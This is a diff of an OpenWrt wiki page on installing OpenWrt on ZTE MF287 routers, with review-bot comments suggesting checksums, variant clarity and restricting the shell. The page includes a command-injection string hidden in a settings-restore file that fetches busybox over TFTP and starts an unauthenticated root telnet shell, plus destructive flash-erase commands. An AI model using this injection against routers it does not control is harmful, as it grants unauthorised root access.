Differences

This shows you the differences between two versions of the page.

toh:zte:mf287 [2024/02/12 11:13] – external edit toh:zte:mf287 [2024/08/07 08:26] – Clarify installation procedure andyboeh
Line 58: Line 58:
  
 ==== Option 1: Install from OEM firmware ==== ==== Option 1: Install from OEM firmware ====
 +<WRAP round important 80%>
 +**Required files**
  
-You need an exploit to get access to the stock firmware. Prepare the following: 
- 
-  * TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well 
   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)
 +  * exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%''
 +  * OpenWrt factory image - this is **not** listed in the table above. Please download it from [[https://firmware-selector.openwrt.org/?version=23.05.4&target=ipq40xx%2Fgeneric&id=zte_mf287pro]]
 +</WRAP>
 +
 +Then do the following preparatory steps:
 +
 +  * Set up a TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well
   * Rename busybox to "telnetd" and put it to your TFTP root directory   * Rename busybox to "telnetd" and put it to your TFTP root directory
-  * Download the exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%'' +  * Put the OpenWrt **factory.bin** file to your TFTP directory as zte.bin
-  * Put the OpenWrt factory.bin file to your TFTP directory as zte.bin+
   * Assign your computer the IP address 192.168.0.22   * Assign your computer the IP address 192.168.0.22
  
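Review bot: the new required-files box sends every reader to the MF287Pro factory image (firmware-selector link with id=zte_mf287pro, 23.05.4), while the partition box further down distinguishes MF287, MF287+ and MF287Pro; a reader with an MF287 or MF287+ would follow this link and put the Pro image on the TFTP server as zte.bin. State which variant the link is for, or give the selector link per variant. The box should also carry a checksum (e.g. SHA-256) for exploit.dat and for the busybox binary: both come from third-party hosts, exploit.dat is uploaded to the router as a settings backup, and the renamed busybox becomes the root shell the whole procedure depends on, so without a hash the reader cannot tell a tampered or truncated download from the intended one.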
Line 72: Line 77:
   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.
   - Watch your TFTP server serving the file "telnetd"   - Watch your TFTP server serving the file "telnetd"
-  - Use a Telnet client and connect to 192.168.0.1 +  - Use a Telnet client and connect to 192.168.0.1 on port 10023 
-  - Login as user "admin" and password "admin"+  - You should be logged in immediately, no password required
   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):
  
 <WRAP round important 80%> <WRAP round important 80%>
-For the MF287Pro, you need to replace ''%%mtd13%%'' with ''%%mtd17%%'' and ''%%mtdblock13%%'' with ''%%mtdblock17%%''!+For the MF287 and MF287+, you need to replace ''%%mtdXX%%'' with ''%%mtd13%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock13%%''
 +For the MF287Pro, you need to replace ''%%mtdXX%%'' with ''%%mtd17%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock17%%''!
 </WRAP> </WRAP>
  
 <WRAP round important 80%> <WRAP round important 80%>
 Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number. Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number.
 +</WRAP>
 +
 +<WRAP round important 80%>
 +Please double-check that you flash the correct file. The factory image is **not** part of the table above, but it can be downloaded from the [[https://firmware-selector.openwrt.org/?version=23.05.4&target=ipq40xx%2Fgeneric&id=zte_mf287pro|Firmware Selector]].
 </WRAP> </WRAP>
  
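Review bot: the step "You should be logged in immediately, no password required" should say plainly that this is an unauthenticated root shell on TCP 10023, reachable by any host that can talk to 192.168.0.1, and that it stays up until the router is rebooted (the exploit string keeps the restore handler sleeping for 3600 s). Advise running the procedure on an isolated LAN with only the workstation at 192.168.0.22 attached, and finishing with the reboot the command list already ends in rather than leaving the shell open. Minor: the first sentence of the mtdXX box has no terminating period, and the new box repeating the factory-image link duplicates the required-files box above; one location for that link is enough, ideally naming the device variant it applies to.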
Line 93: Line 103:
 tftp -g -r zte.bin 192.168.0.22 tftp -g -r zte.bin 192.168.0.22
 cat /proc/driver/sensor_id cat /proc/driver/sensor_id
-flash_erase /dev/mtd13 0 0 +flash_erase /dev/mtdXX 0 0 
-dd if=zte.bin of=/dev/mtdblock13 bs=131072+dd if=zte.bin of=/dev/mtdblockXX bs=131072
 reboot reboot
 </code> </code>
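Review bot: there is no integrity check between `tftp -g -r zte.bin 192.168.0.22` and `flash_erase /dev/mtdXX 0 0`. The download succeeds for whatever the server serves under that name (a stale or wrong image included) and the erase is destructive, so add a size and checksum step before erasing, e.g. `ls -l zte.bin` followed by whichever of `sha256sum`/`md5sum` the OEM shell provides, compared against the hash the firmware selector shows for the image. Also worth confirming in the text: `bs=131072` matches a 128 KiB erase block, which suggests NAND; `dd` through `/dev/mtdblockXX` does not skip bad blocks the way `nandwrite -p` does, so if rootfs is on NAND the page should say that writing via the block device has been verified safe on these devices, or switch to nandwrite.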
Line 164: Line 174:
             return False             return False
                  
-        exploit = ";zte_debug.sh 192.168.0.22 telnetd; sleep 3600\n"+        exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n"
         out = bytearray()         out = bytearray()
         for char in exploit:         for char in exploit:
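Review bot: `/tmp/telnetd -l /bin/sh -p 10023` starts busybox telnetd with /bin/sh as the login program on all interfaces. busybox telnetd accepts `-b ADDR[:PORT]`, so `-b 192.168.0.1:10023` would restrict the unauthenticated root shell to the LAN address the reader is told to connect to (assuming the static 1.21.1 build linked above has that option compiled in, which the default-config binaries do). The command also assumes zte_debug.sh stores the TFTP download at /tmp/telnetd with execute permission; the wiki text only says the TFTP server is seen serving the file, so a sentence explaining what zte_debug.sh does with its two arguments would let the reader understand the command without reading the script.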
  • Last modified: 2024/12/09 10:32
  • by colo